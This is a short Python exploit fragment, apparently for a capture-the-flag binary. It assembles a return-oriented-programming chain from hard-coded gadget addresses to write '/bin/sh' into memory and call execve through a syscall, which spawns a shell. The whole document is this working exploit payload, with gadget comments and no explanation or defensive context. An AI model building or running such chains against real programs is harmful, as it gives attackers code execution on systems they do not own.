payload = p64(0x49f644)
#0x000000000049f644: pop rcx; ret; 
payload += p64(0x4e7070)+p64(0x49f6a8)
# 0x000000000049f6a8: pop rbx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4a29e7)
# 0x00000000004a29e7: add qword ptr [rcx], rbx; ret 0x148; 
payload += p64(0x41c092)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x000000000041c092: pop rax; ret; 
payload += p64(0x0)+p64(0x4e1785)
# 0x00000000004e1785: cdq; ret; 
payload += p64(0x4aade6)
# 0x4aade6: pop rdi ; mov esi, 0x3e1cefc3 ; ret
payload += p64(0x4e7070)+p64(0x49b8be)
# 0x49b8be: pop rsi ; ret
payload += p64(0x0)+p64(0x41c092)
# 0x000000000041c092: pop rax; ret; 
payload += p64(0x3b)+p64(0x4a4785)
# 0x00000000004a4785: syscall; 
payload += b''
